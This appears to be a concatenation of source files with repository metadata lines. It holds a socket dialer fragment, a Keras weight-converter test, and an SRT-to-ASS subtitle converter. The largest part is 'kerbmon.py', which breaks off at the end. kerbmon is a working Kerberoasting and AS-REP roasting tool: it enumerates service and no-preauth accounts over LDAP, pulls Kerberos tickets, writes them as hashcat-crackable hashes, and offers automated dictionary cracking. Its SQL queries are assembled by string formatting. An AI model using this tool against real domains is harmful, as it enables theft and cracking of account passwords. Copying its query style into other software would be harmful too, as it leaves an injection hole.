def __init__(self, service, mainbox):
self.service = service
self.mainbox = mainbox
super(Dialer, self).__init__()
def __del__(self):
try:
self.dialSocket.close()
except AttributeError:
pass
def run(self):
while True:
msg = self.recv()
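            # msg is expected to be a dict carrying at least 'msg' ('dialReq' or 'hangUp'), 'host' and 'port'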
self.dialSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if msg['msg'] == 'dialReq':
self.mainbox.put(('e', 'dialing.'))
self.dialSocket.connect((msg['host'], msg['port']))
self.dialSocket.send(('{"code": 0, "message": "%s"}' % (msg['msg'])).encode())
res = self.dialSocket.recv(128).decode()
if res == 'accept':
self.service.anwser(msg['host'], msg['port'] - 1)
# self.dialSocket.send('client_ready')
self.mainbox.put(('c', 'dial_accepted.'))
elif res == 'deny':
self.mainbox.put(('c', 'denied'))
self.dialSocket.close()
elif msg['msg'] == 'hangUp':
self.dialSocket.connect((msg['host'], msg['port']))
self.dialSocket.send('{"code": 0, "message": "remote_hang_up"}'.encode())
self.mainbox.put(('c', 'hang_up', msg['host']))
self.dialSocket.close()
| 2.234375
| 2
|
tests/weight_converter/keras/test_tensorflow.py
|
bioimage-io/python-core
| 2
|
12784831
|
<filename>tests/weight_converter/keras/test_tensorflow.py
import zipfile
def test_tensorflow_converter(any_keras_model, tmp_path):
from bioimageio.core.weight_converter.keras import convert_weights_to_tensorflow_saved_model_bundle
out_path = tmp_path / "weights"
ret_val = convert_weights_to_tensorflow_saved_model_bundle(any_keras_model, out_path)
assert out_path.exists()
assert (out_path / "variables").exists()
assert (out_path / "saved_model.pb").exists()
assert ret_val == 0 # check for correctness is done in converter and returns 0 if it passes
def test_tensorflow_converter_zipped(any_keras_model, tmp_path):
from bioimageio.core.weight_converter.keras import convert_weights_to_tensorflow_saved_model_bundle
out_path = tmp_path / "weights.zip"
ret_val = convert_weights_to_tensorflow_saved_model_bundle(any_keras_model, out_path)
assert out_path.exists()
assert ret_val == 0 # check for correctness is done in converter and returns 0 if it passes
# make sure that the zip package was created correctly
expected_names = {"saved_model.pb", "variables/variables.index"}
with zipfile.ZipFile(out_path, "r") as f:
        names = set(f.namelist())
assert len(expected_names - names) == 0
| 2.453125
| 2
|
backend/tools/srt2ass.py
|
eritpchy/video-subtitle-extractor
| 2
|
12784832
|
<reponame>eritpchy/video-subtitle-extractor
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import re
import time
import sys
import os
import pysrt
codings = ["utf-8", "utf-16", "utf-32", "gbk", "gb2312", "gb18030", "big5", "cp1252"]
def readings(filename='', content='', encoding=''):
"""
    Read and return the file content.
    filename: file name
    content: bytes or string content already in memory
    encoding: file encoding
"""
    # No content was passed in, so read it from the file
if not content:
if not encoding:
for coding in codings:
try:
with open(filename, 'r', encoding=coding) as file:
content = file.read()
break
except (UnicodeDecodeError, UnicodeError):
print(f"使用{coding}解码失败,尝试替换编码格式.")
continue
except FileNotFoundError:
print("未能找到指定文件,程序即将退出.")
time.sleep(3)
sys.exit(1)
else:
with open(filename, 'r', encoding=encoding) as file:
content = file.read()
return content
def srt_timestamps(content):
""" 获取时间轴存于字典中 """
timestamps = []
for ts in re.findall(r'\d{2}:\d{2}:\d{2},\d{3}.+\d{2}:\d{2}:\d{2},\d{3}', content):
ts = ts.split(' --> ')
timestamps.append(ts)
return timestamps
def format_subtitle(text):
subtitle = re.sub('(\r\n)|\n', '\\\\N{\\\\r原文字幕}', text.strip())
return subtitle
def ass_content(filename, header_path):
subs = pysrt.open(filename)
content = readings(filename=header_path) + '\n'
body = {
'dialogue': 'Dialogue: ',
'front_time': '',
'behind_time': '',
'default': 'Default',
'ntp': 'NTP',
'0': '0',
'sub': ',',
}
for sub in subs:
start = '{:0>2d}:{:0>2d}:{:0>2d}.{:0>2d}'.format(sub.start.hours, sub.start.minutes, sub.start.seconds, round(sub.start.milliseconds/10))
end = '{:0>2d}:{:0>2d}:{:0>2d}.{:0>2d}'.format(sub.end.hours, sub.end.minutes, sub.end.seconds, round(sub.end.milliseconds/10))
        timeline = ','.join(['0', start, end])  # assemble the timeline
        subtitle = format_subtitle(sub.text)  # get the current subtitle text
        list2str = [  # assemble the dialogue fields
body['dialogue'] + timeline,
body['default'],
body['ntp'],
body['0'],
body['0'],
body['0'] + ',',
subtitle]
content += ','.join(list2str)
content += '\n'
return content
def srt_to_ass(filename='', content='', **kwargs):
start_time = time.time()
for_json = kwargs.get('for_json')
header_path = kwargs.get('header_path') if kwargs.get('header_path') else 'backend/tools/header.txt'
encoding = kwargs.get('encoding')
content = ass_content(filename, header_path)
end_time = time.time() - start_time
if for_json:
data = {
'time': end_time,
'content': content
}
return data
return content
def write_srt_to_ass(filename):
filename_ass = re.sub(r'\.srt$', '.ass', filename)
with open(filename_ass, 'w', encoding='utf-8') as to_ass:
to_ass.write(srt_to_ass(filename))
print(filename_ass, '[finish]')
if __name__ == '__main__':
if len(sys.argv) > 1:
for i in range(1, len(sys.argv)):
filename = sys.argv[i]
write_srt_to_ass(filename)
else:
        print('Scanning the current directory for .srt files...')
lis = [li for li in os.listdir() if re.search(r'\.srt$', li)]
for li in lis:
print(li)
        i = input('Convert the files listed above to .ass files? (yes/no): ')
        while i not in ('yes', 'no'):
            i = input('Convert the files listed above to .ass files? (yes/no): ')
if i == 'yes':
for li in lis:
filename = li
filename_ass = re.sub(r'\.srt$', '.ass', filename)
with open(filename_ass, 'w', encoding='utf8') as to_ass:
to_ass.write(srt_to_ass(filename))
print("完成...")
else:
print("取消操作...")
time.sleep(5)
| 2.6875
| 3
|
kerbmon.py
|
Retrospected/kerbmon
| 38
|
12784833
|
<reponame>Retrospected/kerbmon
#!/usr/bin/env python
#
# Author:
# @__Retrospect
# https://github.com/Retrospected/kerbmon/
import argparse
import sys
import os
import logging
import sqlite3
import datetime
import random
from binascii import hexlify, unhexlify
import subprocess
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.ldap import ldap, ldapasn1
from impacket.krb5.asn1 import TGS_REP, AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.ccache import CCache
from impacket.krb5 import constants
from impacket.examples.utils import parse_credentials
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION, UF_DONT_REQUIRE_PREAUTH
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket.smbconnection import SMBConnection
class Database:
def __init__(self,db_file):
self.db_file=db_file
def connect_database(self):
self.conn = sqlite3.connect(self.db_file)
self.cursor = self.conn.cursor()
def create_database(self):
self.connect_database()
sql_spn_table = """ CREATE TABLE IF NOT EXISTS spn (
id integer PRIMARY KEY AUTOINCREMENT,
domain text NOT NULL,
servicePrincipalName text NOT NULL,
sAMAccountName text NOT NULL,
pwdLastSetDate text NOT NULL
); """
sql_np_table = """ CREATE TABLE IF NOT EXISTS np (
id integer PRIMARY KEY AUTOINCREMENT,
domain text NOT NULL,
sAMAccountName text NOT NULL,
pwdLastSetDate text NOT NULL
); """
if self.cursor is not None:
self.create_table(sql_spn_table)
self.create_table(sql_np_table)
def commit(self):
self.conn.commit()
def create_table(self, create_table_sql):
""" create a table from the create_table_sql statement
:param conn: Connection object
:param create_table_sql: a CREATE TABLE statement
:return:
"""
try:
self.cursor.execute(create_table_sql)
        except sqlite3.Error as e:
logger.info(e)
def find_np(self, domain, np):
samaccountname = np[0]
pwdlastsetDate = np[2].split(' ')[0]
npFound = True
cursor = self.cursor
npQuery = 'SELECT pwdLastSetDate FROM np WHERE samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(samAccountNameValue=samaccountname, domainValue=domain)
npResult = cursor.execute(npQuery).fetchall()
        if len(npResult) == 0:
logger.info(" ** NEW NP FOUND! Domain: "+domain+" sAMAccountName: "+samaccountname+", pulling the TGT.")
npFound=False
logger.info(" ** Adding the NP to the database.")
cursor.execute("INSERT INTO np (domain, sAMAccountName, pwdLastSetDate) VALUES (?,?,?)", (domain, samaccountname, pwdlastsetDate))
        elif len(npResult) == 1:
if pwdlastsetDate != npResult[0][0]:
logger.info(" ** CHANGED PW FOUND! Domain: "+domain+" sAMAccountName: "+samaccountname+" old pwdlastsetDate value: "+npResult[0][0]+ " new pwdlastsetDate value: "+pwdlastsetDate)
cursor.execute("UPDATE np SET pwdLastSetDate=? WHERE sAMAccountName=?",(pwdlastsetDate, samaccountname))
npFound=False
else:
logger.info(" ** huh, more than 1 database match, something wrong here:")
logger.info(" ** domain: "+domain+" samaccountname "+ samaccountname + " pwdlastsetDate: " + pwdlastsetDate)
            raise RuntimeError("unexpected duplicate rows in the np table for this account")
self.commit()
return npFound
def find_spn(self, domain, spn, samaccountname, pwdlastset):
pwdlastsetDate = pwdlastset.split(' ')[0]
results=[]
cursor = self.cursor
spnQuery = 'SELECT pwdLastSetDate FROM spn WHERE servicePrincipalName=\'{spnValue}\' AND samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(spnValue=spn, samAccountNameValue=samaccountname, domainValue=domain)
spnResult = cursor.execute(spnQuery).fetchall()
        if len(spnResult) == 0:
logger.info(" ** NEW SPN FOUND! Domain: "+domain+" SPN: "+spn+" sAMAccountName: "+samaccountname)
samQuery = 'SELECT * FROM spn WHERE samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(samAccountNameValue=samaccountname, domainValue=domain)
samResult = cursor.execute(samQuery).fetchall()
            if len(samResult) == 0:
logger.info(" ** SAMAccount did not have a SPN registered yet, so going to pull the TGS.")
results.append(spn)
results.append(samaccountname)
else:
logger.info(" ** SAMAccount already had a SPN registered, so not going to pull the TGS.")
logger.info(" ** Adding the SPN to the database.")
cursor.execute("INSERT INTO spn (domain, servicePrincipalName, sAMAccountName, pwdLastSetDate) VALUES (?,?,?,?)", (domain, spn, samaccountname, pwdlastsetDate))
        elif len(spnResult) == 1:
if pwdlastsetDate != spnResult[0][0]:
logger.info(" ** CHANGED PW FOUND! Domain: "+domain+" SPN: "+spn+" sAMAccountName: "+samaccountname+" old pwdlastsetDate value: "+spnResult[0][0]+ " new pwdlastsetDate value: "+pwdlastsetDate)
cursor.execute("UPDATE spn SET pwdLastSetDate=? WHERE sAMAccountName=?",(pwdlastsetDate, samaccountname))
results.append(spn)
results.append(samaccountname)
else:
logger.info(" ** huh, more than 1 database match, something wrong here:")
logger.info(" ** domain: "+domain+" spn: "+ spn + " samaccountname "+ samaccountname + " pwdlastsetDate: " + pwdlastsetDate)
            raise RuntimeError("unexpected duplicate rows in the spn table for this account")
self.commit()
return results
class Roaster:
def __init__(self, username, password, user_domain, target_domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = user_domain
self.__targetDomain = target_domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = cmdLineOptions.outputfile
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGS = cmdLineOptions.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__targetDomain.split('.')
self.__baseDN = ''
for i in domainParts:
self.__baseDN += 'dc=%s,' % i
# Remove last ','
self.__baseDN = self.__baseDN[:-1]
# We can't set the KDC to a custom IP when requesting things cross-domain
# because then the KDC host will be used for both
# the initial and the referral ticket, which breaks stuff.
if user_domain != target_domain and self.__kdcHost:
logger.info('DC ip will be ignored because of cross-domain targeting.')
self.__kdcHost = None
def getMachineName(self):
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__targetDomain, self.__targetDomain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
                raise Exception('Error while anonymous logging into %s' % self.__targetDomain)
else:
try:
s.logoff()
except Exception:
# We don't care about exceptions here as we already have the required
# information. This also works around the current SMB3 bug
pass
return "%s.%s" % (s.getServerName(), s.getServerDNSDomainName())
@staticmethod
def getUnixTime(t):
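        # Convert a Windows FILETIME value (100-ns ticks since 1601-01-01) into a Unix timestamp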
t -= 116444736000000000
t /= 10000000
return t
def getTGT_ASREP(self, userName, requestPAC=True):
clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = self.__targetDomain.upper()
logger.info(" ** Getting the krb5asrep ticket of user: "+userName+" from domain: "+domain)
serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
encodedPacRequest = encoder.encode(pacRequest)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacRequest
reqBody = seq_set(asReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.proxiable.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
seq_set(reqBody, 'cname', clientName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['rtime'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
# RC4 not available, OK, let's ask for newer types
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
r = sendReceive(message, domain, self.__kdcHost)
else:
raise e
# This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
# 'Do not require Kerberos preauthentication' set
try:
asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
except:
# Most of the times we shouldn't be here, is this a TGT?
asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
else:
# The user doesn't have UF_DONT_REQUIRE_PREAUTH set
raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
# Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
self.writeASREP(self.__outputFileName,'$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode()))
def harvesterNPs(self):
if self.__usersFile:
self.request_users_file_TGTs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
target = self.__kdcHost
else:
target = self.__targetDomain
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
else:
raise
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
logger.info(" ** Searching LDAP for ASREP Roastable accounts")
self.answersNPs = []
try:
sc = ldap.SimplePagedResultsControl(size=1000)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecordNP)
except ldap.LDAPSearchError as e:
logger.info(e.getErrorString())
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
pass
else:
raise
return self.answersNPs
def processRecordNP(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
self.answersNPs.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
def request_multiple_TGTs(self, usernames):
for username in usernames:
try:
entry = self.getTGT_ASREP(username)
self.resultsNPs.append(entry)
except Exception as e:
logging.error('%s' % str(e))
def harvesterSPNs(self):
if self.__usersFile:
self.request_users_file_TGSs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
target = self.__kdcHost
else:
target = self.__targetDomain
logger.info(" ** Connecting to LDAP")
logger.debug("To LDAP server: "+target)
logger.debug("With BaseDN: "+self.__baseDN)
logger.debug("To KDC host: "+str(self.__kdcHost))
logger.debug("With auth domain: "+self.__domain)
logger.debug("And auth user: "+self.__username)
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
else:
raise
filter_person = "objectCategory=person"
filter_not_disabled = "!(userAccountControl:1.2.840.113556.1.4.803:=2)"
searchFilter = "(&"
searchFilter += "(" + filter_person + ")"
searchFilter += "(" + filter_not_disabled + "))"
logger.info(" ** Searching LDAP for SPNs")
self.answersSPNs = []
try:
sc = ldap.SimplePagedResultsControl(size=1000)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecordSPN)
except ldap.LDAPSearchError as e:
logger.info(e.getErrorString())
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
pass
else:
raise
return self.answersSPNs
def processRecordSPN(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
pass
else:
for spn in SPNs:
self.answersSPNs.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logger.info('Skipping item, cannot process due to error %s' % str(e))
pass
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logger.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logger.debug('Using TGT from cache')
return TGT
else:
logger.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
# In order to maximize the probability of getting session tickets with RC4 etype, we will convert the
# password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
# cleartext password.
# If no clear text password is provided, we just go with the defaults.
if self.__password != '' and (self.__lmhash == '' and self.__nthash == ''):
try:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,
compute_lmhash(self.__password),
compute_nthash(self.__password), self.__aesKey,
kdcHost=self.__kdcHost)
except Exception as e:
logger.debug('TGT: %s' % str(e))
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
else:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def getTGS(self, answers):
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
# Get a TGT for the current user
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = self.__outputFileName
else:
fd = None
for user, SPN in users.items():
logger.info(" ** Getting TGS from user: "+user+" with SPN: "+SPN)
sAMAccountName = user
downLevelLogonName = self.__targetDomain + "\\" + sAMAccountName
try:
principalName = Principal()
principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
principalName.components = [downLevelLogonName]
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, self.__targetDomain + "/" + sAMAccountName, fd)
except Exception as e:
logger.debug("Exception:", exc_info=True)
logger.debug('Principal: %s - %s' % (downLevelLogonName, str(e)))
def writeASREP(self, fd, asrep):
writer = open(fd+"."+asrep.split('$')[2]+".krb5asrep", 'a')
writer.write(asrep + '\n')
writer.close()
def writeTGS(self, fd, tgs):
writer = open(fd+"."+tgs.split('$')[2]+".krb5tgs", 'a')
writer.write(tgs + '\n')
writer.close()
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 (RC4-HMAC) the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
# Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96)
# last 12 bytes of the encrypted ticket represent the checksum of the decrypted
# ticket
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
else:
logger.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
# Save the ticket
logger.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception as e:
logger.error(str(e))
if __name__ == "__main__":
#required args: db file, creds, target-domain file, outputfile
parser = argparse.ArgumentParser(add_help = True, description = "Query domains for SPNs that are configured and for users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Monitor for changes and pull latest TGT or TGS tickets.")
parser.add_argument('-credentials', action='store', help='[required] domain/username[:password]', required=True)
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
parser.add_argument('-domainsfile', help='[required] File with domains (FQDN) per line to test', required=True)
parser.add_argument('-dbfile', help='[required] SQLite3 DB file to use as a database', required=True)
parser.add_argument('-crack', action='store', metavar = "wordlist", help='Automatically attempt to crack the TGS service ticket(s) using a dictionary attack with the provided wordlist (using Hashcat)')
parser.add_argument('-outputfile', action='store', help='Output file to write new or changed SPNs to. A date and timestamp will be appended to the filename as well as the encryption type ID of the TGS (23=rc4, 18=aes256, etc).')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
options = parser.parse_args()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
if options.aesKey is not None:
options.k = True
if options.crack is not None and options.outputfile is None:
logger.info("Cannot use the crack option without outputting the results to files using the -outputfile option")
exit()
# enforcing default arguments
options.dc_ip = None
options.usersfile = None
options.request = True
options.save = False
options.request_user = None
options.hashes = None
logger = logging.getLogger('logger')
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
infoHandler = logging.FileHandler('info.log')
infoHandler.setLevel(logging.INFO)
infoHandler.setFormatter(formatter)
logging.getLogger().addHandler(infoHandler)
stdoutHandler = logging.StreamHandler(sys.stdout)
logging.getLogger().addHandler(stdoutHandler)
if options.debug is True:
debugHandler = logging.FileHandler('debug_' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '.log')
debugHandler.setLevel(logging.DEBUG)
debugHandler.setFormatter(formatter)
